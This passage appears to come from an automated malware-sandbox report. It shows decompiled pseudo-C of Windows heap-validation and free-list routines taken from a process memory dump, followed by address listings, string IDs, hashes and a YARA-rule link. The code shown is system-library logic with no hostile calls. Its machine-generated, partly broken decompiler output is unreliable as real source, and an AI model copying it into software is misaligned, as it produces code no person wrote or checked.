				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00C849A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xcb6378 = _t267;
						asm("int3");
						 *0xcb6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00BF174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00BCB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00BCB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xcb6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00C09660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00BF174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00BCB150();
										} else {
											E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00BCB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00BCB150();
									} else {
										E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00BCB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00BCB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00C84AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00C7FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00C723E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                        0x00c844a1
                                                                                        0x00c844a3
                                                                                        0x00c844a7
                                                                                        0x00c844ac
                                                                                        0x00c844af
                                                                                        0x00c844b2
                                                                                        0x00c844b9
                                                                                        0x00c844bc
                                                                                        0x00c847f2
                                                                                        0x00c847f2
                                                                                        0x00c847f8
                                                                                        0x00c847fc
                                                                                        0x00c847fe
                                                                                        0x00c84804
                                                                                        0x00c84805
                                                                                        0x00c84805
                                                                                        0x00c8480c
                                                                                        0x00c84810
                                                                                        0x00c84812
                                                                                        0x00c84812
                                                                                        0x00c84812
                                                                                        0x00c84822
                                                                                        0x00c84822
                                                                                        0x00c84827
                                                                                        0x00c84827
                                                                                        0x00000000
                                                                                        0x00c84827
                                                                                        0x00c844c4
                                                                                        0x00c844d3
                                                                                        0x00c844d9
                                                                                        0x00c844dc
                                                                                        0x00c844de
                                                                                        0x00c844e0
                                                                                        0x00c84560
                                                                                        0x00c84520
                                                                                        0x00c84522
                                                                                        0x00c84525
                                                                                        0x00c84528
                                                                                        0x00c8452b
                                                                                        0x00c8452e
                                                                                        0x00c84530
                                                                                        0x00c84697
                                                                                        0x00c8469d
                                                                                        0x00c846a1
                                                                                        0x00c846c0
                                                                                        0x00c846c5
                                                                                        0x00c846a3
                                                                                        0x00c846b8
                                                                                        0x00c846bd
                                                                                        0x00c846cb
                                                                                        0x00c846d4
                                                                                        0x00c84677
                                                                                        0x00c84677
                                                                                        0x00c84679
                                                                                        0x00c8467c
                                                                                        0x00c8468a
                                                                                        0x00c84690
                                                                                        0x00c84690
                                                                                        0x00c847f1
                                                                                        0x00c847f1
                                                                                        0x00c847f1
                                                                                        0x00000000
                                                                                        0x00c847f1
                                                                                        0x00c84536
                                                                                        0x00c84539
                                                                                        0x00c8453c
                                                                                        0x00c84636
                                                                                        0x00c8463c
                                                                                        0x00c84640
                                                                                        0x00c8465f
                                                                                        0x00c84664
                                                                                        0x00c84642
                                                                                        0x00c84657
                                                                                        0x00c8465c
                                                                                        0x00c84670
                                                                                        0x00000000
                                                                                        0x00c84542
                                                                                        0x00c84542
                                                                                        0x00c84546
                                                                                        0x00c84548
                                                                                        0x00c8454b
                                                                                        0x00c84555
                                                                                        0x00c8455b
                                                                                        0x00c8455b
                                                                                        0x00c8455b
                                                                                        0x00c8455d
                                                                                        0x00c8455d
                                                                                        0x00c8455d
                                                                                        0x00000000
                                                                                        0x00c8455d
                                                                                        0x00c8453c
                                                                                        0x00c84579
                                                                                        0x00c8457c
                                                                                        0x00c84587
                                                                                        0x00c84589
                                                                                        0x00c84591
                                                                                        0x00c84592
                                                                                        0x00c84597
                                                                                        0x00c84598
                                                                                        0x00c845a1
                                                                                        0x00c845ab
                                                                                        0x00c845ab
                                                                                        0x00c845a1
                                                                                        0x00c845ae
                                                                                        0x00c845b4
                                                                                        0x00c845b9
                                                                                        0x00c845bd
                                                                                        0x00c84759
                                                                                        0x00c84759
                                                                                        0x00c8475f
                                                                                        0x00c84761
                                                                                        0x00c84763
                                                                                        0x00c84765
                                                                                        0x00c84768
                                                                                        0x00c8476b
                                                                                        0x00c8476d
                                                                                        0x00c8479c
                                                                                        0x00c8479c
                                                                                        0x00c8479f
                                                                                        0x00c847a2
                                                                                        0x00c847a4
                                                                                        0x00c84830
                                                                                        0x00c84833
                                                                                        0x00c84879
                                                                                        0x00c8487d
                                                                                        0x00c848f1
                                                                                        0x00c848f3
                                                                                        0x00c848f3
                                                                                        0x00000000
                                                                                        0x00c848f3
                                                                                        0x00c8487f
                                                                                        0x00c84885
                                                                                        0x00c84887
                                                                                        0x00c848a8
                                                                                        0x00c848a8
                                                                                        0x00c848ae
                                                                                        0x00c848b0
                                                                                        0x00c848dc
                                                                                        0x00c848dc
                                                                                        0x00c848dc
                                                                                        0x00c848dc
                                                                                        0x00c848ec
                                                                                        0x00000000
                                                                                        0x00c848ec
                                                                                        0x00c848b2
                                                                                        0x00c848bc
                                                                                        0x00c848be
                                                                                        0x00c848c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c848c3
                                                                                        0x00c848c3
                                                                                        0x00c848c6
                                                                                        0x00c848c9
                                                                                        0x00c848cc
                                                                                        0x00c848d1
                                                                                        0x00c848d4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c848d6
                                                                                        0x00c848d7
                                                                                        0x00c848da
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c848da
                                                                                        0x00c8494f
                                                                                        0x00c84955
                                                                                        0x00c84959
                                                                                        0x00c84978
                                                                                        0x00c8497d
                                                                                        0x00c8495b
                                                                                        0x00c84970
                                                                                        0x00c84975
                                                                                        0x00c84986
                                                                                        0x00c84987
                                                                                        0x00c8498a
                                                                                        0x00c8498d
                                                                                        0x00c84997
                                                                                        0x00c847ef
                                                                                        0x00c847ef
                                                                                        0x00c847ef
                                                                                        0x00000000
                                                                                        0x00c847ef
                                                                                        0x00c84890
                                                                                        0x00c84890
                                                                                        0x00c84891
                                                                                        0x00c84891
                                                                                        0x00c84894
                                                                                        0x00c84897
                                                                                        0x00c8489d
                                                                                        0x00c848a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c848a2
                                                                                        0x00c848a3
                                                                                        0x00c848a6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c848a6
                                                                                        0x00c848fb
                                                                                        0x00c84901
                                                                                        0x00c84905
                                                                                        0x00c84924
                                                                                        0x00c84929
                                                                                        0x00c84907
                                                                                        0x00c8491c
                                                                                        0x00c84921
                                                                                        0x00c8492f
                                                                                        0x00c84935
                                                                                        0x00c84936
                                                                                        0x00c84939
                                                                                        0x00c84942
                                                                                        0x00000000
                                                                                        0x00c84947
                                                                                        0x00c84835
                                                                                        0x00c8483b
                                                                                        0x00c8483f
                                                                                        0x00c8485e
                                                                                        0x00c84863
                                                                                        0x00c84841
                                                                                        0x00c84856
                                                                                        0x00c8485b
                                                                                        0x00c84869
                                                                                        0x00c8486c
                                                                                        0x00c8486f
                                                                                        0x00c847e7
                                                                                        0x00c847e7
                                                                                        0x00000000
                                                                                        0x00c847ec
                                                                                        0x00c847aa
                                                                                        0x00c847b0
                                                                                        0x00c847b4
                                                                                        0x00c847d3
                                                                                        0x00c847d8
                                                                                        0x00c847b6
                                                                                        0x00c847cb
                                                                                        0x00c847d0
                                                                                        0x00c847de
                                                                                        0x00c847df
                                                                                        0x00c847e2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c8476f
                                                                                        0x00c8476f
                                                                                        0x00c84778
                                                                                        0x00c84785
                                                                                        0x00c84787
                                                                                        0x00c8478c
                                                                                        0x00c8478e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84790
                                                                                        0x00c84792
                                                                                        0x00c84794
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84796
                                                                                        0x00c84799
                                                                                        0x00000000
                                                                                        0x00c84799
                                                                                        0x00000000
                                                                                        0x00c845c3
                                                                                        0x00c845c3
                                                                                        0x00c845c7
                                                                                        0x00c845c7
                                                                                        0x00c845ca
                                                                                        0x00c845cf
                                                                                        0x00c845d3
                                                                                        0x00c845df
                                                                                        0x00c845e4
                                                                                        0x00c845e6
                                                                                        0x00c845e8
                                                                                        0x00c845ed
                                                                                        0x00c845ed
                                                                                        0x00c845f2
                                                                                        0x00c845f2
                                                                                        0x00c845f7
                                                                                        0x00c845fc
                                                                                        0x00c84602
                                                                                        0x00c84606
                                                                                        0x00c84609
                                                                                        0x00c8460f
                                                                                        0x00c846de
                                                                                        0x00c846e3
                                                                                        0x00c846e5
                                                                                        0x00c846ec
                                                                                        0x00c846ee
                                                                                        0x00c846f6
                                                                                        0x00c846f6
                                                                                        0x00c846f6
                                                                                        0x00c846f6
                                                                                        0x00c846ec
                                                                                        0x00c84615
                                                                                        0x00c84615
                                                                                        0x00c8461d
                                                                                        0x00c8462e
                                                                                        0x00c8462e
                                                                                        0x00c8461d
                                                                                        0x00c8460f
                                                                                        0x00c84609
                                                                                        0x00c846fd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c84710
                                                                                        0x00c8471a
                                                                                        0x00c84720
                                                                                        0x00c84720
                                                                                        0x00c84722
                                                                                        0x00c8472c
                                                                                        0x00000000
                                                                                        0x00c8472e
                                                                                        0x00c8472e
                                                                                        0x00000000
                                                                                        0x00c8472e
                                                                                        0x00c8472c
                                                                                        0x00c84738
                                                                                        0x00c8473c
                                                                                        0x00c8474b
                                                                                        0x00c84751
                                                                                        0x00c84751
                                                                                        0x00000000
                                                                                        0x00c8473c
                                                                                        0x00c848f4
                                                                                        0x00c848f4
                                                                                        0x00000000
                                                                                        0x00c848f4

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                        • API String ID: 0-1357697941
                                                                                        • Opcode ID: 55e7c0a11e4886b496d7a489877cbded56b6ed62b25098052b07fd27f070d27e
                                                                                        • Instruction ID: 93cd7250a419857340d15bb61e07c5fbb90916f660c0df7f928d1db69b18b214
                                                                                        • Opcode Fuzzy Hash: 55e7c0a11e4886b496d7a489877cbded56b6ed62b25098052b07fd27f070d27e
                                                                                        • Instruction Fuzzy Hash: F4F16531610646DFCB28EF69C481FBAB7F5FF09308F188069E056A7291D734AE89CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E00BEA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xcb8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00BEA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00BEDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00BC9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00BCA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xcb8748 - 1;
						if( *0xcb8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00BCB150();
								__eflags =  *0xcb7bc8;
								if( *0xcb7bc8 == 0) {
									__eflags = 1;
									E00C82073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xcb8748 - 1;
							if( *0xcb8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00BF174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00BE7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00C814FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00BC9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00BC9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xcb8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00BCB150();
											} else {
												E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00BCB150();
											_pop(_t491);
											__eflags =  *0xcb7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00C82073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00C8A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00BEA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00BE7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
